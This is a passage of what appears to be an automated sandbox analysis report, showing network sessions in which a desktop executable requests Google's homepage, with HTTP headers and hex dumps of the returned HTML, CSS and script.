                                                                                                                                                                                                        Data Ascii: 0px;position:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gst
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 32 29 3b 2d 6f
                                                                                                                                                                                                        Data Ascii: -size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-moz-box-shadow:0 2px 4px rgba(0,0,0,.12);-o
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 67 62 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70 61 6c 62 7b 66 6f 6e 74 3a 31 33 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70
                                                                                                                                                                                                        Data Ascii: ,sans-serif}#gbpms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{font:13px Arial,sans-serif;line-height:27px;padding:10p


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        14192.168.2.449751142.250.185.2284436944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1192INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:02 GMT
                                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                                                                                                        Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                        Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-j0ADRrRGfWWpVX6-MsNhfA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                        Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        Set-Cookie: AEC=AZ6Zc-WO3DSUpXnBCpcavIfFBBeecYqJKjEP_hDjuRfq-7TPW_QiUepWyg; expires=Sun, 13-Jul-2025 11:40:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                        Set-Cookie: NID=520=rH8Y28hwwqXmFqiob-dN0d07nWf_yPIxUuK4vFE1RCmcK7AaA4Go2vPhfrcsmDbCNgR-9byGbjzZlU3SE--Mf60fBMfhWygEtj1Y66HwEWCXhB_ZylsCxj5-YMm93-Uc8NzQCZ-WxEB0CEaoFHTdhIrUMmw7CLq0tZnSQHS1IEQsJCdr8pHCNy9StDlZ01ju5N-FHR-ooHOq; expires=Wed, 16-Jul-2025 11:40:02 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC198INData Raw: 34 37 62 66 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61
                                                                                                                                                                                                        Data Ascii: 47bf<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has ma
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f
                                                                                                                                                                                                        Data Ascii: ny special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 2c 31 31 2c 31 32 38 34 2c 35 30 37 2c 38 38 2c 32 33 38 2c 32 35 30 2c 31 35 31 2c 32 37 35 2c 31 2c 38 36 2c 35 30 2c 32 33 31 2c 34 33 32 2c 33 35 36 2c 32 2c 36 30 2c 31 38 31 2c 33 36 38 2c 37 38 34 2c 31 34 32 2c 34 36 35 2c 32 2c 37 2c 31 2c 31 32 37 2c 35 38 2c 35 2c 34 30 35 2c 34 31 37 2c 32 37 35 2c 35 38 2c 32 31 30 2c 35 36 34 2c 31 33 39 2c 31 31 39 2c 32 32 32 2c 31 39 38 35 2c 34 34 35 2c 31 35 39 2c 33 35 2c 33 35 33 2c 33 30 39 2c 33 35 30 2c 32 30 32 2c 32 38 35 2c 31 37 2c 33 2c 33 33 39 2c 38 2c 34 35 35 2c 31 39 2c 33 31 35 2c 32 33 33 34 2c 36 37 37 2c 31 36 34 2c 33 2c 34 31 34 2c 36 39 32 2c 35 33 35 2c 33 38 31 2c 31 2c 35 2c 34 2c 34 2c 34 2c 31 36 32 2c 33 36 2c 36 33 39 2c 35 32 2c 36 34 37 2c 34 2c 31 36 31 2c 35 38 2c 34 39
                                                                                                                                                                                                        Data Ascii: ,11,1284,507,88,238,250,151,275,1,86,50,231,432,356,2,60,181,368,784,142,465,2,7,1,127,58,5,405,417,275,58,210,564,139,119,222,1985,445,159,35,353,309,350,202,285,17,3,339,8,455,19,315,2334,677,164,3,414,692,535,381,1,5,4,4,4,162,36,639,52,647,4,161,58,49
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 49 3d 6e 3b 67 6f 6f 67 6c 65 2e 67 65 74 4c 45 49 3d 70 3b 67 6f 6f 67 6c 65 2e 6d 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                        Data Ascii: I=n;google.getLEI=p;google.ml=function(){return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 61 6b 20 61 7d 61 3d 21 31 7d 61 26 26 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 2c 21 30 29 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 67 62 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 23 67
                                                                                                                                                                                                        Data Ascii: ak a}a=!1}a&&b.preventDefault()},!0);}).call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#g
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 64 65 78 3a 31 3b 74 6f 70 3a 2d 31 70 78 3b 6c 65 66 74 3a 2d 32 70 78 3b 72 69 67 68 74 3a 2d 32 70 78 3b 62 6f 74 74 6f 6d 3a 2d 32 70 78 3b 6f 70 61 63 69 74 79 3a 2e 34 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72
                                                                                                                                                                                                        Data Ascii: dex:1;top:-1px;left:-2px;right:-2px;bottom:-2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelr
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 3b 63 6f 6c 6f 72 3a 23 33 36 63 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 70 78 7d 2e 67 62 7a 30 6c 20 2e 67 62 74 73 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62 32 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62
                                                                                                                                                                                                        Data Ascii: ;color:#36c;padding-bottom:1px;padding-top:2px}.gbz0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gb
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 39 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f
                                                                                                                                                                                                        Data Ascii: inline-block;line-height:9px;padding-left:20px;margin-top:10px;position:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.co
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 6e 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 6d 68 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78
                                                                                                                                                                                                        Data Ascii: nt;font-weight:bold}.gbmh{border-top:1px solid #bebebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 62 70 6d 74 63 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 3a 31 31 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 67 62 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70
                                                                                                                                                                                                        Data Ascii: bpmtc{border-top:none;color:#000 !important;font:11px Arial,sans-serif}#gbpms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmp


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        15192.168.2.449752142.250.185.2284436944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1199INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:02 GMT
                                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                                                                                                        Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                        Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-AVR--65TqnF6nA1nm3AykQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                        Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        Set-Cookie: AEC=AZ6Zc-XGxlaC6dL5xRPACsHZCFXBq-2fzcNhyWnkwJ5_nC87BwmEMq-Per8; expires=Sun, 13-Jul-2025 11:40:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                        Set-Cookie: NID=520=ka29T59y8hdzqqx9U0rDezBhmBoZ2UPxY63T1dGhbA1hQsm9_hoNFO5UAYrmjDBPSc_EBAHVuvT6Lg7j4oTjuK4-861KuMW_AEV2c_9otjaKmOqe-6xeOy2uyZ30IdZJ0JAI8XEDWXgd606Zm33B6yYUXN1YqGTsF4-aOW6PZW5lWyBKEKvSmn0nwKDSNZ1jNO9MS_l3R_5zQod_wQ; expires=Wed, 16-Jul-2025 11:40:02 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC191INData Raw: 34 64 39 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65
                                                                                                                                                                                                        Data Ascii: 4d96<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74
                                                                                                                                                                                                        Data Ascii: has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_st
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 33 34 2c 32 34 2c 36 34 2c 34 35 2c 35 31 34 2c 31 31 2c 31 37 39 31 2c 35 37 36 2c 31 35 31 2c 36 2c 32 36 36 2c 31 2c 38 39 2c 31 32 2c 36 37 33 2c 32 2c 33 38 32 2c 32 2c 34 30 31 2c 35 34 34 2c 31 39 39 2c 32 34 39 2c 31 31 39 2c 32 2c 33 2c 32 2c 31 36 2c 36 30 32 2c 36 33 2c 31 39 31 2c 32 32 31 2c 34 31 30 2c 32 37 35 2c 35 38 2c 37 37 34 2c 31 33 39 2c 31 31 39 2c 32 32 30 2c 34 30 2c 31 37 33 33 2c 38 35 33 2c 31 31 39 37 2c 33 32 33 2c 31 37 2c 33 2c 31 33 30 2c 32 2c 36 2c 31 38 36 2c 34 35 37 2c 38 32 35 2c 31 2c 39 31 33 2c 31 37 2c 39 31 33 2c 33 36 30 2c 32 32 32 2c 31 32 2c 38 31 2c 31 36 35 2c 33 2c 34 31 38 2c 31 36 30 34 2c 31 2c 35 2c 34 2c 34 2c 34 2c 31 36 33 2c 37 32 37 2c 36 34 37 2c 33 2c 32 30 34 2c 31 35 2c 34 39 38 2c 33 30 30
                                                                                                                                                                                                        Data Ascii: 34,24,64,45,514,11,1791,576,151,6,266,1,89,12,673,2,382,2,401,544,199,249,119,2,3,2,16,602,63,191,221,410,275,58,774,139,119,220,40,1733,853,1197,323,17,3,130,2,6,186,457,825,1,913,17,913,360,222,12,81,165,3,418,1604,1,5,4,4,4,163,727,647,3,204,15,498,300
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 6d 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 62 3b 72 65 74 75 72
                                                                                                                                                                                                        Data Ascii: ml=function(){return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;retur
